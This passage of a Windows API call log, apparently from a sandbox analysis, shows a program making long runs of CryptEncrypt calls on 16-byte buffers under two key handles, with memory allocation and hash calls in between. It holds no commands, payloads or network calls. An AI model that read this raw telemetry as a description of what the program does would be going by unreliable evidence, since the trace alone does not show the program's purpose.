pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.484] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.484] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.484] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.484] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.485] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.486] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] malloc (_Size=0x1fd) returned 0x3def010 [0157.487] free (_Block=0x0) [0157.487] free (_Block=0x3d81e60) [0157.487] free (_Block=0x606108) [0157.487] malloc (_Size=0x1fd) returned 0x606108 [0157.487] free (_Block=0x0) [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.487] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.488] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.489] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.489] free (_Block=0x0) [0157.490] free (_Block=0x3def010) [0157.490] malloc (_Size=0x1fd) returned 0x3def010 [0157.490] free (_Block=0x0) [0157.490] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.490] CryptHashData (hHash=0x432d38, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.490] malloc (_Size=0x14) returned 0x3f652c0 [0157.490] free (_Block=0x0) [0157.490] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339faec) returned 1 [0157.490] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.490] free (_Block=0x3f652c0) [0157.491] CryptDestroyHash (hHash=0x432d38) returned 1 [0157.491] free (_Block=0x3def010) [0157.491] free (_Block=0x606108) [0157.491] malloc (_Size=0x1fd) returned 0x606108 [0157.491] free (_Block=0x0) [0157.491] malloc (_Size=0x1f2) returned 0x3def010 [0157.491] free (_Block=0x0) [0157.491] malloc (_Size=0x1f2) returned 0x3def210 [0157.491] free (_Block=0x0) [0157.492] free (_Block=0x0) [0157.492] free (_Block=0x3def010) [0157.492] malloc (_Size=0x400) returned 0x3def410 [0157.492] free (_Block=0x0) [0157.492] free (_Block=0x3def210) [0157.492] free (_Block=0x606108) [0157.492] free (_Block=0x3d81e60) [0157.493] malloc (_Size=0x1fd) returned 0x606108 [0157.493] free (_Block=0x0) [0157.493] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.493] free (_Block=0x0) [0157.493] free (_Block=0x0) [0157.493] free (_Block=0x606108) [0157.493] malloc (_Size=0x1fd) returned 0x606108 [0157.493] free (_Block=0x0) [0157.493] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.493] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.494] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.495] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] malloc (_Size=0x1fd) returned 0x3def010 [0157.496] free (_Block=0x0) [0157.496] free (_Block=0x3d81e60) [0157.496] free (_Block=0x606108) [0157.496] malloc (_Size=0x1fd) returned 0x606108 [0157.496] free (_Block=0x0) [0157.496] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.496] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.497] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 